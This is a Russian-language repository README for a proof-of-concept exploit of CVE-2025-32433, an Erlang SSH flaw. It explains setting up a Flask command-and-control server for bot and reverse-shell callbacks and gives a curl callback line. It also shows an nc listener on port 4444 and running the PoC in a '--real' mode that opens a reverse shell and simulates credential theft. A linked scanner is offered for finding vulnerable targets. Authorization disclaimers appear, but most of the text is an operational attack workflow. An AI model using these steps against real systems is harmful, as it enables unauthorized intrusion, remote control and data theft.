
Доказательство концепции эксплуатации уязвимости CVE-2025-32433 с симулированными и реальными режимами атаки, включая C2-сервер на основе Flask для обратных вызовов reverse shell и симуляции пост-эксплуатации.
Этот репозиторий содержит код, демонстрирующий реальный CVE (CVE-2025-32433).
Используйте его только в средах, где у вас есть явное разрешение.
Никогда не тестируйте этот эксплойт против систем, которыми вы не владеете или не управляете.
Несанкционированное использование незаконно, неэтично и наносит вред сообществу кибербезопасности.
симуляционный и реальный POC для CVE-2025-32433
Мой кореш Chocapikk показал мне этот найденный poc erling_cve.py, я заинтересовался и захотел протестировать его в безопасной среде.
У вас есть два варианта с этим репозиторием: безопасный симуляционный скрипт и система, которые я описываю ниже.
Или вы можете использовать настоящий erling_cve.py (этичным способом, с осторожностью и только в сетях, на которые у вас есть разрешение для тестирования)
Перед использованием этого инструмента для тестирования или запуска реального эксплойта ознакомьтесь с моим корешем m0usemm0use и его python-скриптом для поиска уязвимых целей CVE-2025-32433!!!!
https://github.com/m0usem0use/erl_mouse
СИМУЛЯЦИОННАЯ версия эксплойта для cve-2025-32433
Настройка сервера C2
создайте C2 на основе Python Flask: мощный для обратных вызовов ботов или обратных оболочек.
Запустите этот скрипт установки на сервере C2
apt update && apt install python3-pip git -y
sudo apt install python3-flask
mkdir ~/c2
cd ~/c2
nano c2_server.py (вставьте скрипт c2_server и отредактируйте по необходимости)
run
python3 c2_server.py
боты (или тестовые скрипты) могут сделать curl домой так
curl -X POST http://:8080/report -d "Bot is online"
Настройка Python venv на Kali
mkdir ~/ssh-bot-lab && cd ~/ssh-bot-lab
Создайте виртуальное окружение Python
python3 -m venv venv
source venv/bin/activate
sudo apt install python3-requests
Тестирование обратного вызова
nano test_callback.py (вставьте скрипт test_callback и отредактируйте по необходимости)
запустите обратный вызов
python3 test_callback.py
Теперь у вас официально есть
A working venv
A live cloud C2
Functional callback injection
-Вам нужно, чтобы на целевой/жертвенной машине был открыт процесс или сервис Erlang (или симулирован)
ЧТО ДЕЛАЕТ Eerling_cve.py?
Подключается к порту 22 целевого IP
Отправляет поддельную строку версии SSH
Отправляет специально сформированный пакет (предположительно для запуска уязвимости — имитируя злоупотребление чем-то вроде недокументированного обработчика SSH Erlang или переполнения буфера)
Запускает обратную оболочку к IP атакующего
Симулирует постэксплуатацию, выполняя команды whoami, uname и ложный 'вывод учетных данных' в /tmp/exfil.log
Мы возьмем наш найденный Erlang-подобный PoC и
Сделаем его функциональным внутри Kali venv
Подключим его к отправке отчетов нашему облачному C2, когда запускается "атака"
Запустим его этично и безопасно в контролируемой лаборатории
Наблюдаем, как он создает /tmp/exfil.log для симуляции украденных данных
с машины Kali
nano poc_erlang_test.py
-вставьте poc_erlang_test.py и отредактируйте по необходимости
Откройте слушатель
в новом терминале выполните
nc -lvnp 4444
запустите poc
python poc_erlang_test.py --real